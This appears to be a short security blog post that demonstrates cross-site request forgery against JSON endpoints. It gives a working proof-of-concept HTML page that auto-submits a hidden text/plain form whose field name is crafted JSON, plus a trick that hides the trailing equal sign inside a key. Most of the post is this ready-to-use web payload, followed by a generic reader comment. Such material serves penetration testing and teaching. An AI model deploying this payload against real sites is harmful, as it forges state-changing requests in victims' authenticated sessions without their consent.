Sometimes you see a possible Cross-Site Request Forgery (CSRF) attack against JSON endpoints, where data is a JSON blob instead of x-www-form-urlencoded data.
Here is a PoC that will send a JSON CSRF.
<html>
<form action="http://127.0.0.1/json" method="post"
enctype="text/plain" name="jsoncsrf">
<input
name='{"json":{"nested":"obj"},"list":["0","1"]}'
type='hidden'>
</form>
<script>
document.jsoncsrf.submit()
</script>
</html>
You can use any JSON including nested objects, lists, etc.
The previous example adds a trailing equal sign =, which will break some parsers. You can get around it with:
<input name='{"json":"data","extra' value='":"stuff"}'
type='hidden'>
Which will give the following JSON:
{"json":"data","extra=":"stuff"}
Your blog has given me that thing which I never expect to get from all over the websites. Nice post guys!
ReplyDelete